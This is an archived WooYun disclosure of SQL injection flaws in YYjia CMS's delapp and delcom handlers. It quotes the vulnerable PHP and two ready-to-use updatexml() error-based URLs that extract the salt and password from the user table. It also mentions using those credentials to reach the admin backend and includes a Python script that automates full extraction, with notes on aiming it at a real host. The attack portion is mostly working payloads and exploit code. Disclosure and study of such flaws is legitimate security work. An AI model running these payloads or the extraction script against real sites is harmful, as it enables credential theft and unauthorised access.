WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-02-04: Details reported to the vendor, awaiting vendor response
2015-02-07: Vendor confirmed; details visible to the vendor only
2015-02-10: Details opened to third-party security partners
2015-04-03: Details opened to core white hats and domain experts
2015-04-13: Details opened to regular white hats
2015-04-23: Details opened to intern white hats
2015-05-08: Details made public
YYjia CMS: insufficient front-end input filtering leads to SQL injection #2
I took another look at this file and found more vulnerabilities:
elseif($caozuo=="delapp"){
    $uploadid=$_GET['id'];
    $lx=$_GET[lx];
    $sql="delete from user_data where zxid='".$uploadid."' and type='2'";
    $_SGLOBAL['db']->query($sql);
    $sql="select * from ".tname('appinfo')." where id=$uploadid";
    $appinfo=$_SGLOBAL['db']->fetch_array($_SGLOBAL['db']->query($sql));
    $logofile=S_ROOT.$appinfo['logo'];
    if($logofile){
        unlink($logofile);
    }
    if($appinfo[type]==2){
        $dsql="select imgurl from androidinfo where appid='".$uploadid."'";
    }elseif($appinfo[type]==1){
        $dsql="select imgurl from appleinfo where appid='".$uploadid."'";
    }elseif($appinfo[type]==3){
        $dsql="select imgurl from wpinfo where appid='".$uploadid."'";
    }
    $dquery=$_SGLOBAL['db']->query($dsql);
    $andrvalue=$_SGLOBAL['db']->fetch_array($dquery);
    $filepics=explode("@@@",$andrvalue[imgurl]);
    foreach($filepics as $dkey=>$dval){
        $dval=substr($dval,19);
        $filepic=S_ROOT.$dval;
        if($filepic){
            unlink($filepic);
        }
    }
    $sql1="delete from appinfo where id=".$uploadid;
    $_SGLOBAL['db']->query($sql1);
    if($lx=="1"){
        $sql2="delete from appleinfo where appid=".$uploadid;
        $_SGLOBAL['db']->query($sql2);
    }elseif($lx=='2'){
        $sql3="delete from androidinfo where appid=".$uploadid;
        $_SGLOBAL['db']->query($sql3);
    }elseif($lx=='3'){
        $sql4="delete from wpinfo where appid=".$uploadid;
        $_SGLOBAL['db']->query($sql4);
    }
    showmessage("成功删除记录","index.php?ac=user&op=myapps");
}
A whole stretch of code, and almost none of the input is filtered: `$_GET['id']` and `$_GET[lx]` go straight into SQL. The first `delete` wraps `$uploadid` in quotes, so with the payload below the `#` merely ends up inside a string literal there; the injection fires in the next statement, `select * from appinfo where id=$uploadid`, where the value is interpolated unquoted, and `$sql1` and the `$lx`-selected deletes are built the same way.
http://192.168.218.13:805//index.php?ac=user&caozuo=delapp&id=-1%20and%20updatexml(1,concat(0x17,(select%20salt%20from%20`user`+limit+0,1)),0)%23
With the extracted credentials, into the admin backend (screenshot omitted):
And one more spot:
if($caozuo){
    if($caozuo=="delcom"){
        $commentid=$_GET['commentid'];
        if($commentid){
            $sql="delete from user_data where uid='".$uid."' and type='4' and zxid=".$commentid;
        }else{
            $sql="delete from user_data where uid='".$uid."' and type='4'";
        }
        $aa=$_SGLOBAL['db']->query($sql);
        showmessage("记录删除成功",$_SERVER['HTTP_REFERER']);
    }
Here `$commentid` is concatenated unquoted into the `delete`, so request:
/index.php?ac=user&caozuo=delcom&commentid=-1%20and%20updatexml(1,concat(0x17,(select%20password%20from%20`user`+limit+0,1)),0)%23
(45app is yyjia's own demo site) :) If you still don't fix it, I have a bigger move to play.
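Both payloads above (the `id` parameter of `delapp` and the `commentid` parameter of `delcom`) use the same error-based technique: `updatexml()` is handed a string that is not valid XPath, and MySQL echoes that string back inside its "XPATH syntax error" message. One caveat a practitioner hits immediately: MySQL quotes at most 32 characters of the offending string, so with a one-character marker such as the report's `0x17` a 32-character md5 hash comes back missing its last character. The script below is an added example, not code from the report or from YYjia CMS: `build_payload()`, `parse_error()` and `extract()` are the technique, paging through long values with `substr()`; `FakeTarget`, `SAMPLE_USER` and the path used by `to_url()` are constructed stand-ins so it runs offline, and `FakeTarget` imitates only the one MySQL behaviour the technique depends on.

```python
"""Error-based extraction through updatexml(), with the 32-character paging caveat.

Added example; not code from the report or from YYjia CMS. Only build_payload(),
parse_error() and extract() are the technique. FakeTarget is a constructed
stand-in for index.php?ac=user&caozuo=delapp so the script runs offline.
"""
import re
from urllib.parse import quote

XPATH_QUOTE_LIMIT = 32                   # MySQL quotes at most 32 chars of the bad XPath
MARK = "\x17"                            # the report's 0x17; 0x7e ('~') is the usual choice
CHUNK = XPATH_QUOTE_LIMIT - len(MARK)    # 31 characters of data survive per error


def build_payload(column, offset=None, length=CHUNK):
    """Raw (not URL-encoded) value for the injectable id parameter.

    With offset=None this is the report's payload apart from the column name;
    with an offset the column is wrapped in substr() so values longer than
    31 characters can be read one page at a time."""
    expr = column if offset is None else f"substr({column},{offset},{length})"
    return (f"-1 and updatexml(1,concat(0x17,(select {expr}"
            f" from `user` limit 0,1)),0)#")


def to_url(payload, base="index.php?ac=user&caozuo=delapp&id="):
    """URL-encode the payload for the GET parameter (base path is an assumption)."""
    return base + quote(payload, safe="")


def parse_error(body):
    """Return the text MySQL quoted in its XPATH error, minus the marker, or None.

    None means no usable error came back: parameter not injectable, errors
    suppressed, or the subquery returned NULL (concat() is then NULL and
    updatexml() does not raise)."""
    m = re.search(r"XPATH syntax error: '(.*?)'", body, re.S)
    if not m or not m.group(1).startswith(MARK):
        return None
    return m.group(1)[len(MARK):]


def extract(column, send):
    """Read `column` in full by paging past the 32-character error limit.

    `send` takes a raw payload and returns the response body."""
    value, offset = "", 1
    while True:
        chunk = parse_error(send(build_payload(column, offset)))
        if chunk is None:
            return value
        value += chunk
        if len(chunk) < CHUNK:       # short or empty page: end of the value
            return value
        offset += CHUNK


class FakeTarget:
    """Constructed stand-in for the vulnerable delapp branch.

    It concatenates the id into SQL exactly as the PHP does, then imitates the
    single MySQL behaviour the technique relies on: a non-XPath string given to
    updatexml() raises an error quoting at most 32 characters of that string."""

    PAT = re.compile(r"updatexml\(1,concat\(0x17,\(select (.+?) from `user` limit 0,1\)\),0\)")

    def __init__(self, user_row):
        self.user_row = user_row     # stands in for the first row of `user`

    def request(self, id_param):
        sql = "select * from appinfo where id=" + id_param   # unquoted, as in the CMS
        m = self.PAT.search(sql)
        if not m:
            return "<html>record deleted</html>"
        expr = m.group(1)
        s = re.fullmatch(r"substr\((\w+),(\d+),(\d+)\)", expr)
        if s:                        # MySQL substr() is 1-based
            col, off, ln = s.group(1), int(s.group(2)), int(s.group(3))
            data = self.user_row[col][off - 1:off - 1 + ln]
        else:
            data = self.user_row[expr]
        xpath = (MARK + data)[:XPATH_QUOTE_LIMIT]
        return f"MySQL Query Error: XPATH syntax error: '{xpath}'"


# Constructed sample row: a 32-hex-character hash, the shape of an md5 password field.
SAMPLE_USER = {"salt": "a3f9Kq", "password": "e10adc3949ba59abbe56e057f20f883e"}


def demo():
    """Return (naive single-shot result, paged result) for the password column."""
    target = FakeTarget(SAMPLE_USER)
    naive = parse_error(target.request(build_payload("password")))
    paged = extract("password", target.request)
    return naive, paged


if __name__ == "__main__":
    naive, paged = demo()
    print("naive payload :", naive, f"({len(naive)} chars, last one lost)")
    print("paged extract :", paged)
    print("salt          :", extract("salt", FakeTarget(SAMPLE_USER).request))
    print("example url   :", to_url(build_payload("password", 1)))
```

Against a real host, replace `FakeTarget.request` with a function that fetches `to_url(payload)` and returns the body; `extract()` needs nothing else. On the CMS side the fix is the usual one: cast `id`, `lx` and `commentid` with `intval()` before they reach any query and restrict the deletes to rows owned by the logged-in user.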
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-02-07 09:41
Status: Under repair
Vendor comment: none yet